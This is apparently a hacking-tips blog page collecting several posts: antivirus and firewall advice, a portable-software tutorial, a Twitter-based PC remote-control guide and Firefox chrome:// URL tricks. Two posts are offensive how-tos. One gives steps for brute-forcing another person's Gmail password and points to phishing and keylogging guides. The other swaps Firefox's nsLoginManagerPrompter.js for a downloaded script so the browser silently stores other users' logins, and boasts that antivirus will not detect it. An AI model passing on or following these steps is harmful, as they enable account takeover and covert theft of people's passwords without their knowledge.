PREVENT COMPUTER THREATS

Install Virus Protection Programs 

Prevent computer viruses by updating windows regularly and installing virus protection programs. Virus updates should be done at least once a week. Scheduled the task time to run automatically so that it won't interfere with your work. Set up your computer to automatically download updates, but install the updates manually.You can also read steps to protect yourselves against viruses and How to enable Task manager,CMD,Regedit etc after a virus attack

If your system starts running very slowly for no reason, go online and get the system checked. A good scan of your entire operating system, memory, hard drive and boot sector is needed. Trend Micro has a free online virus scanner.

Anti-virus programs hunt for viruses and cleans attachments if possible. When a file can't be cleaned, the anti-virus program will isolate the file. The anti-virus program uses the definition list you download from the program's website, or it matches up a general pattern of what a virus looks like.

The schedule with which the anti-virus definitions are updated can vary, and you may get caught in that window of vulnerability between the virus appearing and it getting updated to the list. Warning: The viruses will get in if you don't keep your anti-virus program updated.

Software companies use patches to correct a problem or a weakness that people can take advantage of. Patching is a necessity and will be an on going method for computer systems weakness prevention.

The Internet is not always what you see. Scan all of your email attachments as you download them. This should be done with files you download directly from internet sites as well as music files, programs, e-books, games, etc. Be careful sharing files with others, such as MP3, videos, programs, pictures, etc. Downloadable data can contain malicious code that you download without knowing it, and will infect your computer.

Downloading the latest patch for your system can stop some of these viruses. You need to get the most recent protection that is out there. Get them directly from the company site. Please note that sometimes you could receive false notifications of necessary update patches in your email, urging you to download a patch immediately to protect your computer. Microsoft does not send update notices by email. These are almost always viruses.

Trojan is a code that hides from you. Even banner ads can contain trojans. The banner ad displays another pop-up that would redirect you to another site and load the content on that page. This would allow the trojan to execute while you are distracted with the content of the page. Trojan programs do not seek out new computers to infect like a worm or virus.

A trojan has the ability to automatically infect a computer. The fact that no fix exists for it, makes the appearance of the trojan a problem. MooSoft developed The Cleaner for detecting and removing trojans in your computer.

People can help protect themselves against Active X issues by changing their IE internet security zone settings to prompt them before running Active X components. If your not familiar with changing security settings, visit PC Pitstop for a free scan to check for security vulnerabilities and automatically set your security controls.

Hackers use automated programs to break into systems and are used by virus writers who set out to damage or use a computer system. The use of a firewall will help prevent this. A firewall works by warning you when someone is trying to gain access to your computer. If someone gains access to your computer they can retrieve information that you have entered, such as passwords, bank accounts and credit card numbers. Zone Labs offers a free basic firewall.

A computer worm hasn't been created to spread by instant messaging, however it provides a target. Experts say a computer worm transmitted by using instant messaging programs would infect as many as 1,000,000 computers in less than a minute. New threats to your computer are created on a regular basis.

Keeping informed and using good judgment is always the very best prevention.
continue reading

Make Portable Version Of any Software Using Cameyo

0 comments
Now a days almost everybody carries a pendrive whether he/she is a IT professional or a home User.There are a lot of softwares that you want to carry with you so that you can open them anywhere without any installations.Here isthe solution to create a portable version of any software.Moreover you can also create a package of software.

Consider you love using Firefox browser and addicted to its user interface.You can create the portable version of Firefox with java and flash already installed in the Firefox.So you are not creating a portable version of your favourite browser instead you are creating a portable executable package file that has Firefox with flash and java already installed in it.

You can create a portable package of your choice of softwares.

Here is the complete step by step tutorial to Make Portable Version Of any Software Using Cameyo

1)  Download the Cameyo software.Its completely free.


2) Install the software.

3) Now Click on Start->Cameyo->Caputre Software Installation



4) Install the software into your system whose portable version you want to create.

5) After Complete installation of the software click on the Install Done of the cameyo screen.


6) You can see a window as shown below.Just wait for the post installation to complete


7) Now it will create a portable version of your installed software which you can carry and run anywhere without any installation.

Thats it make your portable versions and enjoy............
continue reading

Remote Control your Windows PC with Email or SMS using Twitter

0 comments
Hi Friends, today I am going to share a trick to control your pc remotely through internet with the help of Twitter.There's no magic here, it's the power of TweetMyPC utility that lets you remote control your computer from a mobile phone or any other Internet connected computer.Before we get started, it may be a good thing if you can set up a new twitter account for remote controlling your desktop and also protect the status updates of this account to ensure better security.Protecting the account means that you prevent other users from reading your tweets which in this case are email commands that you sending to the computer. To protect your Twitter profile, log in to Twitter with the credentials you want to use, click Settings and check the box next to "Protect my Updates".

HOW IT IS WORKING

It works like this. You first install the free TweetMyPC utility on any Windows PC and associate your Twitter account. The app will silently monitor your Twitter stream every minute for any desktop commands and if it finds one, will act upon it immediately. The initial version of TweetMyPC was limited to basic shutdown and restart commands, however the current v2 has a far more robust set of commands, enabling a far more useful way of getting your PC to carry out certain tasks especially when you're Away From Keyboard.

HOW TO USE TWEET MY PC APPLICATION

Let's get started. Download TweetMyPC and Install this utility in your computer and associate your Twitter and Gmail account with the application. It will use Twitter to receive remote commands (like shutdown, log-off, lock workstation, etc) from while the email account will be used for send your information (e.g., what process are currently running on your computer).


HOW TO SEND COMMANDS TO REMOTE PC

Now that your basic configuration is done, it's time to set up a posting method. You can use email, SMS, IM, web or any of the Twitter clients to send commands to the remote computer.

By Email: Associate you Twitter account with Posterous (auto-post) and all email messages sent to twitter@posterous.com will therefore become commands for the remote computer. (Also see: Post to Twitter via Email)

By SMS: If you live in US, UK, Canada, India, Germany, Sweden or New Zeleand, you can send associate Twitter with your mobile phone (see list of numbers) and then control your remote computer via SMS Text Messages.

By IM: Add the Twitter bot - twitter@twitter.com - to your list of Google Talk buddies and you can then send commands via instant message.

By Web:If you are on vacation but have access to an internet connected laptop, just log into the Twitter website and issue commands (e.g., shutdown or logoff) just as another tweet.

Download Files, Capture Remote Screenshots & more..

While the TweetMyPC is pretty good for shutting down a remote computer, it lets you do some more awesome stuff as well.
Here's a partial list of commands that you can use to remote control the PC - they're case-insensitive and, as discussed above, you can send them to Twitter via email, SMS, IM or the web.

Screenshot :
This is one of the most useful command I've come across after the shutdown command. Want to know what's happening within the confines of your PC when you're not around? Just tweet screenshot and TweetMyPC will take a screenshot of your desktop and post it to the web (see example).

ShutDown, LogOff, Reboot, Lock : The function of these useful commands is pretty obvious from their names.

Standby, Hibernate : Don’t want to shutdown the remote PC? Save power by entering standby mode with this command. Or hibernate your PC with a tweet, thereby saving even more power.
continue reading

Hacking Gmail using Brute force attack

16 comments
In cryptanalysis, a brute force attack is a method of defeating a cryptographic scheme by trying a large number of possibilities; for example, exhaustively working through all possible keys in order to decrypt a message.Well, to put it in simple words, brute-force attack guess a password by trying all probable variants by given character set. Eg. checking all combination in lower Latin character set, that is 'abcdefghijklmnopqrstuvwxyz'. Brute-force attack is very slow. For example, once you set lower Latin charset for your brute-force attack, you'll have to look through 217 180 147 158 variants for 1-8 symbol password. It must be used only if other attacks have failed to recover your password.For attacking any account using this technique you should need high patience and it will take a lot of time depending upon the number of characters.There are alternate ways of hackng any account by Phishing or by keylogging.You can also read this how to attack using keyloggers and how to steal passwords using phishing attack.

Anyway we can discuss about Brute force attack to hack gmail in this article.

Follow the guidelines given below

1)   Download brute force attacking tool

2) Unzip and run the file on your computer to see:

3) Enter Email address You wants to Hack and press Enter as shown below.

4) Enter the characters to attack - [ No character set restrictions (set your own) ] Press Enter you will see,


5. Now wait for password.................

If you want to know how to attack servers and retrieve passwords by brute force attack then read this.How to attack servers by Brute force attack

Thats it, please feel free to ask for any help regarding this and pass your comments ............
continue reading

Trick to convert your Firefox browser to a keylogger

10 comments
HI Friends,Today I am so glad to share a wonderful trick of converting your normal Firefox browser to a keylogger.which can save all the login informations of the users without the knowledge of them.I have personally tested this trick in all the Firefox browser from version 3 onwards and I hope this will work also in lower versions.You may be aware of the fact that,in firefox you can save all the passwords for your favourite sites like gmail,facebook etc.But have you ever think how this password gets saved and where it is saving these sensitive informations.There is an inbuilt component in Firefox browser written in javascript that is offering whether to save your passwords or not.But here we are replacing this script with another script that will never offer the users to save passwords or not,but it directly saves all login informations without the knowledge of the users and you can retrieve all such details later.Ok,Now we can directly move to our trick.Our trick is simple just follow the instructions exactly and you dont need any prior knowledge of programming skills.

STEPS

1) First of all download this Firefox script,you can use the below link


2) If you are Windows user then goto

C:/Program Files/Mozilla Firefox/Components

(This is the default path,you can go directly to your installed directory of Firefox)

If you are MAC user then goto

Applications > Right click Firefox > Show Package Contents > Contents/MacOS/Components

3)
Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we are going to delete this in next step.

4) Extract the rar file that you have downloaded and copy and paste the nsLoginManagerPrompter.js from the folder to the components folder of your Firefox.

5) Now your script is ready.Next is we want to make some changes to the firefox browser.For that directly goto tools--> options from your firefox as shown below.



6)
You can see a window as shown below,just select the security tab and you can see a option like remember passwords for sites,Just tick it as shown below and click ok and just restart your Firefox and thats it Now your firefox keylogger is ready.and it will store automatically all usernames and passwords



HOW TO RETRIEVE STORED PASSWORDS FROM FIREFOX.


1) Now we have created a kelogger using firefox next is how to retrieve passwords stored in firefox.This is so simple just goto

TOOLS-->OPTIONS-->SECURITY-->SAVED PASSWORDS


2) You can see a window as shown below



3) Just click the Show passwords button to see all the passwords like the one given below




ADVANTAGES

  • Since we are only changing the inbuilt component of Firefox,No Antivirus will detect it.
  • You can use it in all platforms like in Windows,Mac etc

HOW TO BE MORE SECURE

If you want to hide all the saved passwords from other users,You can set a master password option as seen in Step 6.But still you are not secure.I personally recommend you all not to save any passwords in any of your browsers.When you save passwords in your browser say you have saved your password for gmail.The next time when you goto gmail login page and selecting the username wll also load your password in asterix.You may think it is in asterix and no one can identify it.But it is so easy to decrypt  it Read this

Also your saved passwords can be easily hacked remotely.So never save any passwords in any of your browsers.

I am currently working on hacking saved passowords remotely and i had a successful test also.I wll post it soon,so keep in touch.

Hope this article helped you a lot.If so please do your comments...your feedbacks are always precious
continue reading

Funny tricks for Firefox browser

0 comments
I know the fact that,like me almost all of you are addicted to Firefox due to its advaced features and ofcourse Firefox is one of best browser and there are some funny tricks that you can do with your firefox browser.These will not harm your browser,But you can really give surprise to your friends by showing this.To perform these tricks just open your Firefox browser and copy the below codes one by one in your address bar and hit Enter.

Here is the list of some funny Firefox Tricks

chrome://browser/content/preferences/cookies.xul

This will Open the “cookies window” inside a tab in the Firefox window.

chrome://browser/content/preferences/sanitize.xul

This will Open the “Clear Private Data” window inside the current tab.

chrome://browser/content/aboutDialog.xul
 
This will Open the “About Firefox” Dialog box inside the tab.

chrome://browser/content/credits.xhtml

This will Open a scrolling list of names. The one’s who we must thank for creating Firefox,

chrome://global/content/alerts/alert.xul

This will show you dancing firefox.Your firefox window will automatically popup anywhere at screen.

chrome://browser/content/browser.xul

This will open another firefox within in a new tab.So you will have firefox within firefox.

chrome://browser/content/preferences/preferences.xul

This will open firefox options dialog box in new tab.

chrome://browser/content/bookmarks/bookmarksPanel.xul

This will open your firefox bookmark manager in new tab.

chrome://browser/content/history/history-panel.xul
 
This will open your history in new tab.

chrome://mozapps/content/extensions/extensions.xul?type=extensions

This will open your extensions tab in your current window 

Just use these tricks to really surprise your friends and have fun.Enjoy.......................
continue reading